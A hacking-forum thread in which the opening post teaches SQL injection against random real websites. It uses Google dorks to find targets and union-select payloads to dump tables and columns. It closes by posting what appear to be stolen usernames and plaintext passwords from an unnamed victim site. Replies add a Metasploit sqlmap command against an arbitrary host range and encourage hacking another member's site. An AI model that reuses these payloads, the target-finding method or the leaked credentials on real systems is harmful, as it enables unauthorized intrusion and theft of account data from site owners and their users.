Go Back   Viprasys - Your #1 source for freewares > PC Related > Hackers' Lounge

Hackers' Lounge Share All Your Hacking Tips, Tools, Tutorials and Videos Here. Warning For All Members All The Files shared in here are bound to be malicious tools so download at your own risk.

Like Tree2Likes
Similar Threads
Thread Thread Starter Forum Replies Last Post
CEH v6 SQL injection tutorial + video tutor + Auto SQL injector[hotfile] death_adder Hackers' Lounge 0 05-24-2010 06:16 PM
SQL Injection Tutorial snarfy Hackers' Lounge 0 12-11-2009 09:44 PM
MySQL Injection Ultimate Tutorial shabzl33t Hackers' Lounge 5 03-11-2008 09:35 PM
Winrar Tutorial - Complete Rock-Energy-Drinks Tutorials 0 02-05-2008 10:58 AM

Post New Thread  Reply
 
LinkBack Thread Tools Display Modes
Old 09-24-2012, 06:26 PM   #1 (permalink)
windows/system32/cmd.exe
 
Tha-Pentester's Avatar
 
Join Date: Jun 2011
Location: /etc/passwd
Posts: 280
VipraSys Cash: 137,516.01
Thanks (Given): 0
Thanks (Received): 9
Likes (Given): 0
Likes (Received): 2
Tha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond repute
Hackers Lounge sql injection complete tutorial by tha-pentester

assalmualaikum viprasys
once again..im here with a new tutorial
in this video i will show you how you can do sql attack

okay first find a volnuerable website
to get volnerable websites
open google.com
and type one of these dorks


inurl:/index.php?id=
inurl:/news.php?id=
inurl:/page.php?id=
inurl:/view.php?id=
inurl:/item.php?id=

well there is a huge list of google dorks
you can get these from google
okay

when you type one of the google dork..thousands of sites
will be searched
now open a website and type ' at the end of url
if you get this error


then the website is vuln and you can try to hack it


oka now that you have this error

now you need to find number of columns

now remove ' and type

order by 1(syntax)
now your url will be like
[Only registered users can see links. ] order by 1

if you dont get any error then increase number
[Only registered users can see links. ] order by 2 (no error)
[Only registered users can see links. ] order by 3 (no error)
[Only registered users can see links. ] order by 4 (no error)
[Only registered users can see links. ] order by 5 (no error)

[Only registered users can see links. ] order by 6
ohh error came here

Unknown column '6' in 'order clause'

so you have this number of columns in this website is 5

now its time to use union all select statement

oka as we know our website has 5 columns
now wee need to find vunl columns

for that use this syntax

[Only registered users can see links. ] union all select 1,2,3,4,5--


now see the pic 3


here you can clearly see some bold numbers

in this website the number is 3

that mean string column is 3

okay

now lets check the MySql version of the website

to check this you need to replace your url with

[Only registered users can see links. ]
?id=465 union all select 1,2,@@version,4,5--



oka now see the pic 4


you can clearly see in this pic that

where the column number was written, now there is some changing and that is the
database version

okay if the number is greater than or = 5 then its good
because its easy to crack
if its below then you the sql injection is blind
(it does not mean that you cant crack the db but we have to guess
the table names and all )

okay



so now as we have checked this
now we gonna crack its db
oka
lets find the tables of this database
oka now replace the url with

[Only registered users can see links. ] union all select 1,2,table_name,4,5 from information_schema.tables where table_schema=database()

if it does not work then use

[Only registered users can see links. ] union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()

wow see the pic 5 below



we have all its table now

now we have to check its tables and find some table with sensitive information

it may be admin , users , usergroups etc



okay so here im trying to crack this table

cpg131_users


oka so now we need to replace our url with

[Only registered users can see links. ] union all select 1,2,column_name,4,5 from information_schema.columns where table_name=cpg131_users

install hackbar (adds on of firefox) as i have
now click on sql >mysql>Mysqlchar
and type the table name
then you wil get its value

now the decimal value of cpg131_users is (99, 112, 103, 49, 51, 49, 95, 117, 115, 101, 114, 115)

oka copy it and replace the url with

[Only registered users can see links. ] union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=char(99, 112, 103, 49, 51, 49, 95, 117, 115, 101, 114, 115)

well its working

see pic 6



now we need to fetch data of columns

now in this website
the information is in columns


user_name
user_password

oka to fetch these

replace the url with

[Only registered users can see links. ]



wow

we have done it guyz..

there are 3 users in this database

brewmonkey_admin:beavis01
chris:ob5c3n3,mara:0re0gasm
Kevin:kevinspassword


i hope u like this tutorial.

well this tutorial took my 1 hour to create
and if u like it , it will take only 1 second to press the thanks button

regards

tha-pentester
viprasys.org
__________________
Im root, if you see me laughing, you should better have a backup!


To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.

Tha-Pentester is offline   Reply With Quote
Old 09-28-2012, 02:38 AM   #2 (permalink)
tHe OnE yOu HaTe To LoVe!
 
-[/tH3-On3\]-'s Avatar
 
Join Date: Sep 2010
Location: pennsylvania
Posts: 255
VipraSys Cash: 13,028.54
Thanks (Given): 0
Thanks (Received): 0
Likes (Given): 0
Likes (Received): 1
-[/tH3-On3\]- is an unknown quantity at this point
Default Re: sql injection complete tutorial by tha-pentester

bro pentester,i haven't really been up on the whole sql inject topic,but in ur browser how are you actually typing in Mozilla? is it the web developer? ive allways worked with metasploit for my exploiting and finding what is vulnerable
just curious bro on how u were doing the writing on ur web page.
__________________
***dont spam,its good way 2 get banned,and help others out,and thank people for hard work as it will come back to you***
-[/tH3-On3\]- is offline   Reply With Quote
Post Thanks / Like - 0 Thanks, 1 Likes
Old 09-28-2012, 06:41 PM   #3 (permalink)
windows/system32/cmd.exe
 
Tha-Pentester's Avatar
 
Join Date: Jun 2011
Location: /etc/passwd
Posts: 280
VipraSys Cash: 137,516.01
Thanks (Given): 0
Thanks (Received): 9
Likes (Given): 0
Likes (Received): 2
Tha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond repute
Hackers Lounge Re: sql injection complete tutorial by tha-pentester

Quote:
Originally Posted by -[/tH3-On3]- View Post
bro pentester,i haven't really been up on the whole sql inject topic,but in ur browser how are you actually typing in Mozilla? is it the web developer? ive allways worked with metasploit for my exploiting and finding what is vulnerable
just curious bro on how u were doing the writing on ur web page.
bro im not writing on mozila.. im writing on hackbar.. Hackbar is an add-on of firefox. . it just contain adress bar (by using it the most complicated url will be readable and it also does not effected by redirects) and a tool bar.. the adress bar is same like mozila default adress bar.. and the tool bar helps u alot when you are testing for sql injections , XSS holes and website security .... .. well it only helps you in your tests.. BUT DOES NOT TEACH YOU
__________________
Im root, if you see me laughing, you should better have a backup!


To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.

Tha-Pentester is offline   Reply With Quote
Post Thanks / Like - 1 Thanks, 0 Likes
Old 09-30-2012, 02:38 AM   #4 (permalink)
tHe OnE yOu HaTe To LoVe!
 
-[/tH3-On3\]-'s Avatar
 
Join Date: Sep 2010
Location: pennsylvania
Posts: 255
VipraSys Cash: 13,028.54
Thanks (Given): 0
Thanks (Received): 0
Likes (Given): 0
Likes (Received): 1
-[/tH3-On3\]- is an unknown quantity at this point
Default Re: sql injection complete tutorial by tha-pentester

i have a pretty gud idea of how it works bro,i usually am a programmer in vb 6.0 and c++.i think i might have a idea,could i use metasploit for sql inject? just wondering bro.i think you can,i usually run rats from the console.just thought id ask bro.first have 2 learn to understand right. anyway i do appreciate the advice bro.
__________________
***dont spam,its good way 2 get banned,and help others out,and thank people for hard work as it will come back to you***
-[/tH3-On3\]- is offline   Reply With Quote
Old 09-30-2012, 03:53 PM   #5 (permalink)
windows/system32/cmd.exe
 
Tha-Pentester's Avatar
 
Join Date: Jun 2011
Location: /etc/passwd
Posts: 280
VipraSys Cash: 137,516.01
Thanks (Given): 0
Thanks (Received): 9
Likes (Given): 0
Likes (Received): 2
Tha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond repute
Solved Re: sql injection complete tutorial by tha-pentester

well you can use SQLMAP sql injection external module for this. sqlmap is a automatic sql injection tool that is developed in python. you just have to provide it a url .. and it will start looking vulnerabilities , once its detected sql injections in the target host , you will be able to read files,run your commands etc..
Code:
msf > use auxiliary/scanner/http/sqlmap
msf auxiliary(sqlmap) > set RHOSTS [HOST RANGE]
msf auxiliary(sqlmap) > run
hope it may help you
__________________
Im root, if you see me laughing, you should better have a backup!


To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.

Tha-Pentester is offline   Reply With Quote
Post Thanks / Like - 1 Thanks, 1 Likes
Old 12-11-2012, 10:20 AM   #6 (permalink)
Kingdom of Pain
 
King of Pain's Avatar
 
Join Date: Apr 2011
Posts: 136
VipraSys Cash: 3,604.04
Thanks (Given): 0
Thanks (Received): 0
Likes (Given): 0
Likes (Received): 1
King of Pain is an unknown quantity at this point
Default Re: sql injection complete tutorial by tha-pentester

i've got this error,

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1355217544' WHERE session_id='2c743da2042648ea62aa808326d42bc6'' at line 4

but my question in your procedure.... what if there's a lot of table.... do i need to one by one of it?
__________________

To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.
King of Pain is offline   Reply With Quote
Old 12-19-2012, 10:41 AM   #7 (permalink)
windows/system32/cmd.exe
 
Tha-Pentester's Avatar
 
Join Date: Jun 2011
Location: /etc/passwd
Posts: 280
VipraSys Cash: 137,516.01
Thanks (Given): 0
Thanks (Received): 9
Likes (Given): 0
Likes (Received): 2
Tha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond reputeTha-Pentester has a reputation beyond repute
Default Re: sql injection complete tutorial by tha-pentester

you can use group_concat command to fetch all tables.. as i have done in this tutorial..
there is my other video tutorial on SQL injection.. search the forum you will find that :P
__________________
Im root, if you see me laughing, you should better have a backup!


To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.

Tha-Pentester is offline   Reply With Quote
Old 11-24-2013, 05:38 PM   #8 (permalink)
Loyal Member
 
ranran's Avatar
 
Join Date: Oct 2007
Posts: 91
VipraSys Cash: 3,201.75
Thanks (Given): 0
Thanks (Received): 1
Likes (Given): 0
Likes (Received): 0
ranran is an unknown quantity at this point
Send a message via Yahoo to ranran
Default Re: sql injection complete tutorial by tha-pentester

How about this kind of site is there a posibilities to hack ?
what the tools to use?

[Only registered users can see links. ]
ranran is offline   Reply With Quote
Old 12-19-2013, 12:52 PM   #9 (permalink)
__-X-__
 
-_- L.a.F.a.N.g.A -_-'s Avatar
 
Join Date: Aug 2009
Posts: 4,893
VipraSys Cash: 488,179.29
Thanks (Given): 5
Thanks (Received): 2
Likes (Given): 0
Likes (Received): 3
-_- L.a.F.a.N.g.A -_- has a reputation beyond repute-_- L.a.F.a.N.g.A -_- has a reputation beyond repute-_- L.a.F.a.N.g.A -_- has a reputation beyond repute-_- L.a.F.a.N.g.A -_- has a reputation beyond repute-_- L.a.F.a.N.g.A -_- has a reputation beyond repute-_- L.a.F.a.N.g.A -_- has a reputation beyond repute-_- L.a.F.a.N.g.A -_- has a reputation beyond repute-_- L.a.F.a.N.g.A -_- has a reputation beyond repute-_- L.a.F.a.N.g.A -_- has a reputation beyond repute-_- L.a.F.a.N.g.A -_- has a reputation beyond repute-_- L.a.F.a.N.g.A -_- has a reputation beyond repute
Default Re: sql injection complete tutorial by tha-pentester

Quote:
Originally Posted by ranran View Post
How about this kind of site is there a posibilities to hack ?
what the tools to use?

[Only registered users can see links. ]
yes u can hack this kind of sites but they should have some sql error....blind sql or simple......to check sql just add ' in end and see if anything changes on site ;) then use order by statement to find vuln columns then ;) find string column and fetch database ;)
__________________

To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.
-_- L.a.F.a.N.g.A -_- is offline   Reply With Quote
Old 02-09-2014, 04:22 AM   #10 (permalink)
NEW MEMBER
 
Join Date: Nov 2012
Location: Lithuania taurage
Posts: 6
VipraSys Cash: 309.98
Thanks (Given): 1
Thanks (Received): 0
Likes (Given): 1
Likes (Received): 0
nemazius is an unknown quantity at this point
Send a message via Skype™ to nemazius
Default Re: sql injection complete tutorial by tha-pentester

Quote:
Originally Posted by Tha-Pentester View Post
well you can use SQLMAP sql injection external module for this. sqlmap is a automatic sql injection tool that is developed in python. you just have to provide it a url .. and it will start looking vulnerabilities , once its detected sql injections in the target host , you will be able to read files,run your commands etc..
Code:
msf > use auxiliary/scanner/http/sqlmap
msf auxiliary(sqlmap) > set RHOSTS [HOST RANGE]
msf auxiliary(sqlmap) > run
hope it may help you
Yeah it helped alot so if u can put a download of this program u see most of people here didnt find :D
nemazius is offline   Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT. The time now is 12:37 AM.


Powered by vBulletin®
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.6.1
vBCredits II Deluxe - vBulletin Mods & Addons Copyright © 2010-2014 DragonByte Technologies Ltd.
Feedback Buttons provided by Advanced Post Thanks / Like v3.1.6 (Pro) - vBulletin Mods & Addons Copyright © 2014 DragonByte Technologies Ltd.
The logos and trademarks used on this site are the property of their respective owners.
We are not responsible for comments posted by our users, as they are the property of the poster.